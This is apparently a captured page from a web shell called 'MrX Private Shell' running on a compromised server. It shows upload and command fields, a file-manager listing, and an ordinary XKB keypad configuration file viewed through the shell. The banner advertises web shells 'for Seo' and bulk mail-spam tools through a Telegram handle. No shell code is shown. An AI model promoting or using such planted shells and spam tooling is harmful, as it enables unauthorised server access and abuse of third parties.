__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
default partial xkb_types "pc" {
    type "KEYPAD" {
	modifiers = Shift + NumLock;
	map[None] = Level1;
	map[NumLock] = Level2;
	map[Shift+NumLock] = Level1;
	level_name[Level1] = "Base";
	level_name[Level2] = "Number";
    };
};

// On Mac keypads, levels 1 and 2 are swapped.
partial xkb_types "mac" {
    type "KEYPAD" {
	modifiers = None;
	map[None] = Level2;
	level_name[Level2] = "Number";
    };
};

partial xkb_types "microsoft" {
    type "KEYPAD" {
	modifiers = Shift + NumLock;
	map[None] = Level1;
	preserve[Shift] = Shift;
	map[NumLock] = Level2;
	level_name[Level1] = "Base";
	level_name[Level2] = "Number";
    };
};

// Swiss-German style numeric keypad: Shift and NumLock operate as
// two independent modifiers; however, since we want shift state for
// the cursor keys, only three levels are used from the key mappings.
// Closest type is actually FOUR_LEVEL_X, but most numpad layouts use
// FOUR_LEVEL_MIXED_KEYPAD, so that's the one we are going to override.
partial xkb_types "shift3" {
    type "FOUR_LEVEL_MIXED_KEYPAD" {
	modifiers = Shift + NumLock + Control + Alt;

	// NumLock Off => navigate using cursor keys
	map[None] = Level1;

	// NumLock Off + Shift pressed => select using cursor keys
	preserve[Shift] = Shift;

	// NumLock On => decimal digits
	map[NumLock] = Level2;

	// NumLock On + Shift pressed => auxiliary symbols,
	// e.g. hexadecimal digits
	map[Shift+NumLock] = Level3;

	// Ctrl + Alt, regardless of NumLock and Shift => command keys
	map[Control+Alt] = Level4;

	level_name[Level1] = "Base";
	level_name[Level2] = "NumLock";
	level_name[Level3] = "Shift+NumLock";
	level_name[Level4] = "Ctrl+Alt";
    };
};

Filemanager

Name Type Size Permission Actions
README File 246 B 0644
basic File 596 B 0644
cancel File 226 B 0644
caps File 4.43 KB 0644
complete File 179 B 0644
default File 178 B 0644
extra File 4.33 KB 0644
iso9995 File 432 B 0644
level5 File 7.49 KB 0644
mousekeys File 218 B 0644
numpad File 1.62 KB 0644
pc File 1.08 KB 0644
Filemanager